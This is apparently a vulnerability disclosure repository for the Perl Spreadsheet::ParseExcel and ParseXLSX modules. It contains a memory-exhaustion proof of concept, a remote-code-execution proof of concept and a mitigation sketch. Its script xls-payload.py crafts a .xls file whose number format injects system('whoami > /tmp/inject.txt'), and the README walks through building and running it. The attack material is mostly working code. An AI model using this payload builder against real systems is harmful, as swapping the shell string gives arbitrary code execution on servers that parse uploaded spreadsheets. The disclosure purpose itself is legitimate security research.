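The size of the range can be checked with a short Python transcription of `_cell_to_row_col`. `merged_cell_count` is a hypothetical helper that counts how many `"$row;$col"` keys the nested loops would create for a given `ref`, without actually allocating them.

```python
import re


def cell_to_row_col(cell):
    """Python transcription of _cell_to_row_col: 'B3' -> (2, 1), zero-based."""
    col, row = re.search(r"([A-Z]+)([0-9]+)", cell).groups()
    ncol = 0
    for char in col:
        ncol = ncol * 26 + ord(char) - ord("A") + 1
    return int(row) - 1, ncol - 1


def merged_cell_count(ref):
    """Number of cells the nested row/column loops would visit for `ref`."""
    topleft, bottomright = ref.split(":")
    toprow, leftcol = cell_to_row_col(topleft)
    bottomrow, rightcol = cell_to_row_col(bottomright)
    return (bottomrow - toprow + 1) * (rightcol - leftcol + 1)


print(merged_cell_count("A1:ZZZZ9999"))
```

Column `ZZZZ` is column number 475,254 and there are 9,999 rows, so the loops visit 4,752,064,746 cells, each of which becomes a hash key.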
77 | 
78 | ### Mitigation
79 | I think that this vulnerability can be fixed in either of two ways:
80 | - Set a limit in range inside `_cell_to_row_col` subroutine
81 | - Use a different method to handle merged cells, instead of preemptively marking like the current solution.
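Both ideas can be combined, as in the Python sketch below. It is an illustration of the approach rather than a proposed patch: the `MergedAreas` class is hypothetical, and the default bounds assume the worksheet limits of current Excel versions (1,048,576 rows and 16,384 columns, zero-based here). Ranges are stored as rectangles and membership is tested on demand, so memory grows with the number of ranges rather than with their area.

```python
class MergedAreas:
    """Stores merged ranges as rectangles instead of marking every cell."""

    def __init__(self, max_row=1_048_575, max_col=16_383):
        # Zero-based limits; the defaults are an assumption, adjust as needed.
        self.max_row = max_row
        self.max_col = max_col
        self.areas = []

    def add(self, top, left, bottom, right):
        """Register one merged range after validating its bounds."""
        if not (0 <= top <= bottom <= self.max_row):
            raise ValueError("row range outside sheet limits")
        if not (0 <= left <= right <= self.max_col):
            raise ValueError("column range outside sheet limits")
        self.areas.append((top, left, bottom, right))

    def is_merged(self, row, col):
        """Check membership lazily; cost is linear in the number of ranges."""
        return any(
            t <= row <= b and l <= col <= r for t, l, b, r in self.areas
        )


areas = MergedAreas()
areas.add(0, 0, 9998, 16383)
print(areas.is_merged(5000, 10), areas.is_merged(9999, 0))
```

A bounds check alone is not enough, since a range covering a full sheet within those limits still has about 1.7e10 cells; that is why the sketch avoids per-cell marking altogether.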
82 | 


--------------------------------------------------------------------------------
/poc/.gitignore:
--------------------------------------------------------------------------------
1 | tmp/
2 | .DS_STORE
3 | .vscode/
4 | 


--------------------------------------------------------------------------------
/poc/README.md:
--------------------------------------------------------------------------------
 1 | ## POC for ParseExcel and ParseXLSX vulnerabilities
 2 | ### Memory exhaustion
 3 | Build and run docker image in `/bomb` folder, using this command
 4 | 
 5 | `docker build -t perl-xlsx-bomb . && docker run --name perl-xlsx-bomb -m 4g -d perl-xlsx-bomb`
 6 | 
 7 | `-m 4g` limits the memory available to the docker container.
 8 | The process keeps filling memory and swap until it is finally terminated for running out of resources.
 9 | 
10 | ### RCE
11 | Build and run docker image in `/rce`, using this command
12 | 
13 | `docker build -t parseexcel-rce . && docker run parseexcel-rce`
14 | 
15 | Note that a successful RCE results in `root` being written to `/tmp/inject.txt` after each perl run.
16 | 
17 | #### .xls exploit
18 | Because the data is binary, it's quite hard to modify manually, so I wrote a small script, `xls-payload.py`, to do that.
19 | Also, there are a lot of flag checks and integrity checks in the xls code path, and I chose not to dig into all of them, so I don't know exactly what they do. The overall idea of the script is therefore to first add a custom format in the Excel app as a placeholder that matches the length of the desired payload. The script then overwrites that placeholder and fixes up the format mappings. And voilà.
20 | 
21 | Here are the steps:
22 | 1. Run `xls-payload.py` and copy the placeholder it prints (including the quotation marks on both ends).
23 | 2. Create a `test.xls` file in the same folder (make sure to use the Excel app on Windows; I'm not sure why, but Excel on macOS, OpenOffice and LibreOffice strip some flags that we need). Enter a number in a cell, go to `Format Cell` > `Custom` and paste the placeholder. The cell should now show a bunch of `a`s.
24 | 3. Press Enter in the script once more. The xls file is now corrupted (don't open it in the Excel app again, or the payload will be lost). Then `mv test.xls rce/` and start a docker container to verify.
25 | 


--------------------------------------------------------------------------------
/poc/bomb/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM perl:5.32
2 | 
3 | COPY ahihi.xlsx /app/ahihi.xlsx
4 | COPY ahihi.pl /app/ahihi.pl
5 | WORKDIR /app
6 | RUN cpanm Spreadsheet::ParseXLSX
7 | 
8 | CMD ["perl", "ahihi.pl"]
9 | 


--------------------------------------------------------------------------------
/poc/bomb/ahihi.pl:
--------------------------------------------------------------------------------
 1 | use Spreadsheet::ParseXLSX;
 2 | use Spreadsheet::ParseExcel;
 3 | use open qw( :std :encoding(UTF-8) );
 4 | 
 5 | my $t = time();
 6 | my $parser = Spreadsheet::ParseXLSX->new();
 7 | my $workbook = $parser->parse("ahihi.xlsx") or die $parser->error;
 8 | 
 9 | $t = time() - $t;
10 | print "Parsing took $t secs\n";
11 | 


--------------------------------------------------------------------------------
/poc/bomb/ahihi.xlsx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/haile01/perl_spreadsheet_excel_rce_poc/1c747faa046b3e66ec73a62779ba1f410d0a6fa1/poc/bomb/ahihi.xlsx


--------------------------------------------------------------------------------
/poc/rce/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM perl:5.32
2 | 
3 | COPY . /app
4 | WORKDIR /app
5 | RUN cpanm Spreadsheet::ParseExcel@0.65
6 | RUN cpanm Spreadsheet::ParseXLSX@0.27
7 | 
8 | CMD bash run.sh
9 | 


--------------------------------------------------------------------------------
/poc/rce/run.sh:
--------------------------------------------------------------------------------
 1 | echo "=== POC for ParseXLSX ==="
 2 | rm -f /tmp/inject.txt
 3 | perl test.pl
 4 | cat /tmp/inject.txt
 5 | 
 6 | echo "=== POC for ParseExcel ==="
 7 | rm -f /tmp/inject.txt
 8 | perl test-xls.pl
 9 | cat /tmp/inject.txt
10 | 


--------------------------------------------------------------------------------
/poc/rce/test-xls.pl:
--------------------------------------------------------------------------------
1 | use Spreadsheet::ParseExcel;
2 | use open qw( :std :encoding(UTF-8) );
3 | 
4 | my $parser = Spreadsheet::ParseExcel->new();
5 | my $workbook = $parser->parse("test.xls") or die $parser->error;
6 | 


--------------------------------------------------------------------------------
/poc/rce/test.pl:
--------------------------------------------------------------------------------
1 | use Spreadsheet::ParseXLSX;
2 | use Spreadsheet::ParseExcel;
3 | use open qw( :std :encoding(UTF-8) );
4 | 
5 | my $parser = Spreadsheet::ParseXLSX->new();
6 | my $workbook = $parser->parse("test.xlsx") or die $parser->error;
7 | 


--------------------------------------------------------------------------------
/poc/rce/test.xls:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/haile01/perl_spreadsheet_excel_rce_poc/1c747faa046b3e66ec73a62779ba1f410d0a6fa1/poc/rce/test.xls


--------------------------------------------------------------------------------
/poc/rce/test.xlsx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/haile01/perl_spreadsheet_excel_rce_poc/1c747faa046b3e66ec73a62779ba1f410d0a6fa1/poc/rce/test.xlsx


--------------------------------------------------------------------------------
/poc/xls-payload.py:
--------------------------------------------------------------------------------
 1 | # Inject shell to format string
 2 | shell = "system('whoami > /tmp/inject.txt')"
 3 | fmtStr = f'[>123;{shell}]123'
 4 | pattern = f'"{"a" * (len(fmtStr) - 2)}"'
 5 | print(pattern)
 6 | input()
 7 | 
 8 | xls = open('test.xls', 'rb').read()
 9 | 
10 | l = xls.index(pattern.encode())
11 | assert l != -1 #Pattern must exist
12 | r = l + len(pattern)
13 | 
14 | fmtIdx = xls[l - 5:l - 3]
15 | payload_len = len(fmtStr)
16 | 
17 | xls = xls[:l] + fmtStr.encode() + xls[r:]
18 | 
19 | # Apply format string to xf
20 | XF_opcode_w_len = b'\xe0\x00\x14\x00' # Assume highest BIFF version
21 | l = xls.index(XF_opcode_w_len) # First means format index = 0
22 | assert l != -1 # XF must exist
23 | xls = xls[:l + 6] + fmtIdx + xls[l + 8:]
24 | 
25 | # Apply format to cell
26 | RK_opcode = b'\x7e\x02'
27 | l = xls.index(RK_opcode)
28 | assert l != -1 # RK record must exist
29 | l += 8
30 | 
31 | xls = xls[:l] + b'\x00\x00' + xls[l + 2:] # format index 0
32 | 
33 | open('test.xls', 'wb').write(xls)
34 | 


--------------------------------------------------------------------------------